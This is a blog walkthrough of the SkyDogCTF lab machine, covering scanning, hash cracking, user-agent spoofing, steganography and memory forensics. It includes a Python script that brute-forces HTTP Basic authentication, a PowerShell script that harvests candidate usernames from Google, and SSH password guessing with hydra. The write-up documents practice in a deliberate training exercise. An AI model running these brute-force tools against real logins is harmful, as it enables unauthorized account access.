Saturday, December 24, 2016

SkyDogCTF Walkthrough

 

This is the first time I’ve attempted a CTF.  Here’s a walkthrough for each flag.

Nmap scan…

image

SSH on port 22222 – Found flag #1 flag{53c82eba31f6d416f331de9162ebe997}

image

Cracked the hash – “encrypt”

 findmyhash md5 -h 53c82eba31f6d416f331de9162ebe997  

image

I pulled the index.html file with wget and found a comment about IE4 and /oldIE/html5.js

image

Reviewed the js file; the first line is hex…

image

Decoded the hex and found flag #2 flag{7c0132070a0ef71d542663e9dc1f5dee}

image

Cracked the hash – “nmap”

image

DIRB scan… and found /personnel

image

Tried to access /personnel but it seems to be “protected”

image

I assume “IE4” was a clue so I tried accessing /personnel with an IE4 user agent – found flag#3 flag{14e10d570047667f904261e6d08f520f} and another clue – so far so good.

image

I decided to take a look with FireFox… Agent Hanratty

image

Cracked the hash – “evidence” …  Clue = new + flag = newevidence

image

I tried to access /newevidence with IE4 user agent – 401 Unauthorized

image

Same using Burp Suite (using proxy to manipulate user agent) and FireFox

image

Tried to logon, hanratty:hanratty, didn’t work;

image

What is Agent Hanratty’s first name? Google says it’s Carl

image

I setup Burp Suite Intruder in an attempt to gain access but the free version is pretty slow…

image

… so I wrote a crude script in Python.  This let me try several username combinations with a couple dirb word lists for the password.  I got lucky with username “carl.hanratty” and password “Grace”.

image

 import subprocess;  
 import os;  
 import base64;  
 import time;  
 username = 'carl.hanratty'  
 seperator = ':'  
 count = 0  
 filename = '/usr/share/wordlists/dirb/others/names.txt'  
 target = 'http://192.168.12.12/newevidence'  
 #headers  
 useragent = '--user-agent=Mozilla/4.0 (compatible; MSIE 4.0; Windows NT 5.0)'  
 accept = '--header=Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'  
 acceptlang = '--header=Accept-Language: en-US,en;q=0.5'  
 acceptenc = '--header=Accept-Encoding: gzip, deflate'  
 connection = '--header=Connection: close'  
 with open(filename) as fp:  
   for line in fp:  
     password = line.replace("\n","")  
     creds = username + ":" + password  
     b64 = "%s" % (base64.b64encode(creds.encode('ascii')))  
     print "Trying %s %s" % (creds,b64)  
     auth = "--header=Authorization: Basic %s" % (b64)  
     try:  
       subprocess.check_output(['wget',target,useragent,accept,acceptlang,acceptenc,connection,auth])  
     except:  
       pass  
     if os.path.isfile("/root/Desktop/scripts/newevidence"):  
       break  
     count += 1  
     #time.sleep(1)  

I took a look with FireFox…

image

Checked out the hyperlink “Evidence Summary File” - found flag #4 flag{117c240d49f54096413dd64280399ea9}

image

Cracked the hash – “panam”

image

The hyperlink “Possible Location” links to an image.jpg, saved it, ran it through binwalk and then steghide with password “panam”.  found flag #5 flag{d1e5146b171928731385eb7ea38c37b8} and another clue.  So far, the cracked hashes are clues for the next flag but…

image

I got stuck here for a bit and tried a bunch of things.  I ended up taking things back to the beginning with nmap.

I wasn’t sure why the server was running HTTPS; everything I found so far was accessible over HTTP.  I took a look using openssl s_client and found flag #6 flag{f82366a9ddc064585d54e3f78bde3221}. 

image

Since it’s labeled “flag3” - I was supposed to find it earlier in the game – better late than never.

Cracked the hash – “personnel” – HA! yes, this was a clue for earlier.  Thank goodness dirb found the directory.

image

Stuck again… decided to give SSH a whirl… meh.  Brute force here we come…

I tried some standard name lists with various combos of username formats with the cracked hashes and clues as passwords.  It was taking too long; the username list had too many names.  I need to be more specific…

I wrote a Powershell script which queried Google looking for names related to the search strings I provided… (cheating? maybe… I didn’t review the results to see if anything was related to SkyDogCTF).

 $searchstrings = @(  
  "%22agent+hanratty%22",  
  "%22catch+me+if+you+can%22",  
  "%22Dont+go+Home+Frank%22",  
  "%22Theres+a+Hex+on+Your+House%22",  
  "%22Obscurity+or+Security%22",  
  "%22Be+Careful+Agent+Frank+Has+Been+Known+to+Intercept+Traffic+Our+Traffic%22",  
  "%22A+Good+Agent+is+Hard+to+Find%22",  
  "%22The+Devil+is+in+the+Details+Or+is+it+Dialogue%22",  
  "%22if+its+Simple+Guessable+or+Personal+it+Goes+Against+Best+Practices%22",  
  "%22Where+in+the+World+is+Frank%22",  
  "%22Frank+Was+Caught+on+Camera+Cashing+Checks+and+Yelling%22",  
  "%22The+Fastest+Man+Alive%22",  
  "%22Franks+Lost+His+Mind+or+Maybe+its+His+Memory%22",  
  "%22He+Locked+Himself+Inside+the+Building%22",  
  "%22Find+the+Code+to+Unlock+the+Door+Before+He+Gets+Himself+Killed%22",  
  "%22encrypt%22",  
  "%22nmap%22",  
  "%22personnel%22",  
  "%22newevidence%22",  
  "%22panam%22",  
  "%22iheartbrenda%22",  
  "%22ILoveFrance%22"  
 )  
 $names = gc C:\temp\names.txt  
 $googlenames = $null  
 $firstnamelastnames = @()  
 $googlednames = @()  
 $i = 1  
 $totalsearches = $searchstrings.count  
 foreach($searchstring in $searchstrings)  
 {  
  write-host "Searching Google [$i of $totalsearches]... " -foregroundcolor Green  
  $googlesays = (Invoke-WebRequest "https://www.google.com/search?q=$searchstring" -useragent ([Microsoft.PowerShell.Commands.PSUserAgent]::InternetExplorer))  
  $googlenames += $names | ?{$googlesays.rawcontent.contains($_)}  
  $f = 1  
  $totalnames = $googlenames.count  
  $l = $1  
  write-host " Parsing Results..." -ForegroundColor Cyan  
  #look for "firstname lastname"  
  foreach($firstname in $googlenames)  
  {  
   if($googlesays.rawcontent.contains("$firstname") -eq $true)  
   {  
    $googlednames += "$firstname"  
   }  
   foreach($lastname in $googlenames)  
   {  
    if($googlesays.rawcontent.contains("$firstname $lastname") -eq $true)  
    {  
     $firstnamelastnames += "$firstname $lastname"  
    }  
   }  
  }  
  write-host "...Sleeping" -foregroundcolor Red  
  start-sleep -seconds 2  
  $i++  
 }  
 $firstlast = ($firstnamelastnames | Group-Object).Name.replace(" ","")  
 #$first_space_last = ($firstnamelastnames | Group-Object).Name  
 $first_dot_last = ($firstnamelastnames | Group-Object).Name.replace(" ",".")  
 $first_underscore_last = ($firstnamelastnames | Group-Object).Name.replace(" ","_")  
 $firstlast += $firstlast.tolower() + $firstlast.toupper()  
 #$first_space_last += $first_space_last.tolower() + $first_space_last.toupper()  
 $first_dot_last += $first_dot_last.tolower() + $first_dot_last.toupper()  
 $first_underscore_last += $first_underscore_last.tolower() + $first_underscore_last.toupper()  
 $firstlast  
 #$first_space_last  
 #$first_dot_last  
 #$first_underscore_last  
 #$googlednames | Group-Object  

… this gave me a smaller list of usernames.  It was taking about 2 minutes to run ~200 usernames with one password at the default of 16 tasks in hydra.  I wasn’t sure of the username format so I used a couple variations and ended up with ~600 usernames and 8 passwords.  Again, I used the previous cracked hashes and clues for the password list.  I kicked hydra off and headed to bed.

The next day… ugh.  No hits but looking back through the logs I see a bunch of failures, reattempts, etc.  To make a long story short, I rebooted the server and tried the  user list with each password using the –p switch.  I also throttled tasks down to 1.  I was finally able to run through the lists with a smaller number of failures/reattempts.  I’ll have to revisit this again in the future… anyhow, I got a hit.

image

SSH to the server with the credentials for barryallen; Found flag #7 flag{bd2f6a1d5242c962a05619c56fa47ba6}

image

Cracked the hash – “theflash”

image

The last flag has to be in the security-system.data file; so I downloaded it

image

Ran it through binwalk; appears to be a zip archive

image

Unzip and binwalk… looks like a dmp?

image

Ran it through volatility

image

Dumped the clipboard contents… “666c61677b38343164643364623239623066626264383963376235626537363863646338317d”

image

found flag #8 flag{841dd3db29b0fbbd89c7b5be768cdc81}

image

Attempted to crack the hash… not a known hash.

image

No comments:

Post a Comment